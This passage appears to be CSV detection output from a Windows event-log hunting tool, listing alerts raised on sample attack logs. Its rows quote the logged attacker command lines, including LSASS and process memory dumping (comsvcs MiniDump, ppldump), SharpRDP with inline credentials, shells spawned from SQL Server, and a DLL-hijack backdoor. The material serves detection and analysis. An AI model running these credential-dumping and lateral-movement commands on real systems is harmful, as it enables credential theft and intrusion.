.exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/Persistence_Winsock_Catalog Change EventId_1.evtx +2019-08-23 21:37:38.521 +09:00,MSEDGEWIN10,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/Persistence_Winsock_Catalog Change EventId_1.evtx +2019-08-23 21:37:38.521 +09:00,MSEDGEWIN10,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/Persistence_Winsock_Catalog Change EventId_1.evtx +2019-08-30 21:54:07.873 
+09:00,MSEDGEWIN10,1,informational,Process Creation,Command: cscript c:\ProgramData\memdump.vbs notepad.exe : Path: C:\Windows\System32\cscript.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\System32\cmd.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx +2019-08-30 21:54:07.873 +09:00,MSEDGEWIN10,1,high,WScript or CScript Dropper,,rules/sigma/process_creation/win_malware_script_dropper.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx +2019-08-30 21:54:08.257 +09:00,MSEDGEWIN10,7,informational,WMI Modules Loaded,,rules/sigma/image_load/sysmon_wmi_module_load.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx +2019-08-30 21:54:08.354 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 C:\windows\system32\comsvcs.dll, MiniDump 4868 C:\Windows\System32\notepad.bin full : Path: C:\Windows\System32\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx +2019-08-30 21:54:08.354 +09:00,MSEDGEWIN10,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx +2019-08-30 21:54:08.354 +09:00,MSEDGEWIN10,1,medium,Process Dump via Comsvcs DLL,,rules/sigma/process_creation/win_susp_comsvcs_procdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx +2019-09-01 20:54:22.450 +09:00,MSEDGEWIN10,5145,medium,DCERPC SMB Spoolss Named 
Pipe,,rules/sigma/builtin/security/win_dce_rpc_smb_spoolss_named_pipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/spoolsample_5145.evtx +2019-09-03 20:04:07.207 +09:00,MSEDGEWIN10,3,high,Suspicious Outbound RDP Connections,,rules/sigma/network_connection/sysmon_susp_rdp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/tunna_iis_rdp_smb_tunneling_sysmon_3.evtx +2019-09-03 20:04:56.358 +09:00,MSEDGEWIN10,3,high,Suspicious Outbound RDP Connections,,rules/sigma/network_connection/sysmon_susp_rdp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/tunna_iis_rdp_smb_tunneling_sysmon_3.evtx +2019-09-09 04:17:44.249 +09:00,MSEDGEWIN10,13,low,Usage of Sysinternals Tools,,rules/sigma/registry_event/registry_event_sysinternals_eula_accepted.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_valid_account_guest_rid_hijack.evtx +2019-09-22 20:22:05.201 +09:00,MSEDGEWIN10,4732,high,User added to local Administrators group,User: - : SID: S-1-5-21-3461203602-4096304019-2269080069-501 : Group: Administrators,rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalAdministratorsGroup.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/Network_Service_Guest_added_to_admins_4732.evtx +2019-09-22 20:23:19.251 +09:00,MSEDGEWIN10,4732,high,User added to local Administrators group,User: - : SID: S-1-5-20 : Group: Administrators,rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalAdministratorsGroup.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/Network_Service_Guest_added_to_admins_4732.evtx +2019-11-03 22:51:58.263 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c set > c:\users\\public\netstat.txt : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\sqlsvc : Parent Command: ""c:\Program Files\Microsoft SQL Server\MSSQL10.SQLEXPRESS\MSSQL\Binn\sqlservr.exe"" 
-sSQLEXPRESS",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/sysmon_1_exec_via_sql_xpcmdshell.evtx +2019-11-03 22:51:58.263 +09:00,MSEDGEWIN10,1,critical,Suspicious Shells Spawn by SQL Server,,rules/sigma/process_creation/win_susp_shell_spawn_from_mssql.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/sysmon_1_exec_via_sql_xpcmdshell.evtx +2019-11-15 17:19:02.298 +09:00,alice.insecurebank.local,1102,high,Security log was cleared,User: bob,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/4624 LT3 AnonymousLogon Localhost - JuicyPotato.evtx +2019-11-15 17:19:17.134 +09:00,alice.insecurebank.local,4634,informational,Logoff,User: ANONYMOUS LOGON : LogonID: 0x1d12916,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/4624 LT3 AnonymousLogon Localhost - JuicyPotato.evtx +2020-01-15 05:44:50.353 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 url.dll,FileProtocolHandler ms-browser:// : Path: C:\Windows\System32\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx +2020-01-15 05:44:50.353 +09:00,MSEDGEWIN10,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx +2020-01-15 05:44:50.353 +09:00,MSEDGEWIN10,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx +2020-01-15 05:44:51.016 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""cmd.exe"" /c notepad.exe : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: rundll32 url.dll,FileProtocolHandler ms-browser://",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx +2020-01-15 05:44:51.122 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: notepad.exe : Path: C:\Windows\System32\notepad.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""cmd.exe"" /c notepad.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx +2020-01-15 05:46:43.237 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 url.dll,OpenURL ms-browser:// : Path: C:\Windows\System32\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx +2020-01-15 05:46:43.237 +09:00,MSEDGEWIN10,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx +2020-01-15 05:46:43.237 +09:00,MSEDGEWIN10,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx +2020-01-15 05:46:43.819 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""cmd.exe"" /c notepad.exe : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: rundll32 
url.dll,OpenURL ms-browser://",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx +2020-01-15 05:46:43.836 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: notepad.exe : Path: C:\Windows\System32\notepad.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""cmd.exe"" /c notepad.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx +2020-01-15 05:48:17.044 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: cmd.exe /c start ms-browser:// : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx +2020-01-15 05:48:17.044 +09:00,MSEDGEWIN10,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx +2020-01-15 05:48:17.412 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""cmd.exe"" /c notepad.exe : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd.exe /c start ms-browser://",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx +2020-01-15 05:48:17.447 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: notepad.exe : Path: C:\Windows\System32\notepad.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""cmd.exe"" /c notepad.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx 
+2020-01-15 05:48:45.243 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: explorer ms-browser:// : Path: C:\Windows\explorer.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx +2020-01-15 05:48:45.243 +09:00,MSEDGEWIN10,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx +2020-01-15 05:48:45.293 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding : Path: C:\Windows\explorer.exe : User: MSEDGEWIN10\IEUser : Parent Command: ?",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx +2020-01-24 04:09:34.052 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: SharpRDP.exe computername=192.168.56.1 command=""C:\Temp\file.exe"" username=domain\user password=password : Path: C:\ProgramData\USOShared\SharpRDP.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/sharprdp_sysmon_7_mstscax.dll.evtx +2020-02-10 17:28:12.856 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: suspicious execution path : Command: Furutaka.exe dummy2.sys : Path: C:\Users\Public\BYOV\TDL\Furutaka.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DSE_bypass_BYOV_TDL_dummydriver_sysmon_6_7_13.evtx +2020-02-10 
17:28:12.856 +09:00,MSEDGEWIN10,1,high,Execution from Suspicious Folder,,rules/sigma/process_creation/win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DSE_bypass_BYOV_TDL_dummydriver_sysmon_6_7_13.evtx +2020-02-10 19:08:24.535 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: suspicious execution path : Command: ppldump.exe -p lsass.exe -o a.png : Path: C:\Users\Public\BYOV\ZAM64\ppldump.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_BYOV_Zam64_CA_Memdump_sysmon_7_10.evtx +2020-02-10 19:08:24.535 +09:00,MSEDGEWIN10,1,high,Execution from Suspicious Folder,,rules/sigma/process_creation/win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_BYOV_Zam64_CA_Memdump_sysmon_7_10.evtx +2020-02-10 19:08:24.666 +09:00,MSEDGEWIN10,10,high,LSASS Access from Program in Suspicious Folder,,rules/sigma/process_access/win_susp_proc_access_lsass_susp_source.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_BYOV_Zam64_CA_Memdump_sysmon_7_10.evtx +2020-03-07 22:17:38.534 +09:00,-,-,low,Rare Schtasks Creations,[condition] count() by TaskName < 5 in timeframe [result] count:1 TaskName:\\FullPowersTask timeframe:7d,rules/sigma/builtin/security/win_rare_schtasks_creations.yml,- +2020-03-07 22:17:39.984 +09:00,MSEDGEWIN10,4699,medium,Scheduled Task Deletion,,rules/sigma/builtin/security/win_scheduled_task_deletion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_SeImpersonatePriv_enabled_back_for_upnp_localsvc_4698.evtx +2020-03-09 07:11:34.340 +09:00,MSEDGEWIN10,4656,critical,LSASS Access from Non System Account,,rules/sigma/builtin/security/win_lsass_access_non_system_account.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_hashdump_4663_4656_lsass_access.evtx +2020-03-09 
07:11:34.340 +09:00,MSEDGEWIN10,4656,high,Generic Password Dumper Activity on LSASS,,rules/sigma/builtin/security/win_susp_lsass_dump_generic.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_hashdump_4663_4656_lsass_access.evtx +2020-03-21 14:00:16.296 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: usoclient StartInteractiveScan : Path: C:\Windows\System32\UsoClient.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:17.980 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:17.992 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:17.997 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 
+2020-03-21 14:00:18.007 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:18.014 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:18.046 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:25.189 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:25.195 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : 
Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:25.215 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:25.221 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:25.234 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:25.250 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session 
Orchestrator Dll Hijack.evtx +2020-03-21 14:00:25.392 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:25.421 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:25.443 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:25.459 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:25.499 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : 
User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:25.548 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:39.226 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: suspicious execution path : Command: nc.exe 127.0.0.1 1337 : Path: C:\Users\Public\Tools\nc.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:39.226 +09:00,MSEDGEWIN10,1,high,Execution from Suspicious Folder,,rules/sigma/process_creation/win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:39.441 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:45.087 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: whoami : Path: C:\Windows\System32\whoami.exe : User: NT AUTHORITY\SYSTEM : Parent 
Command: ""C:\Windows\system32\cmd.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:45.087 +09:00,MSEDGEWIN10,1,high,Run Whoami as SYSTEM,,rules/sigma/process_creation/win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:45.087 +09:00,MSEDGEWIN10,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:45.087 +09:00,MSEDGEWIN10,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:54.689 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 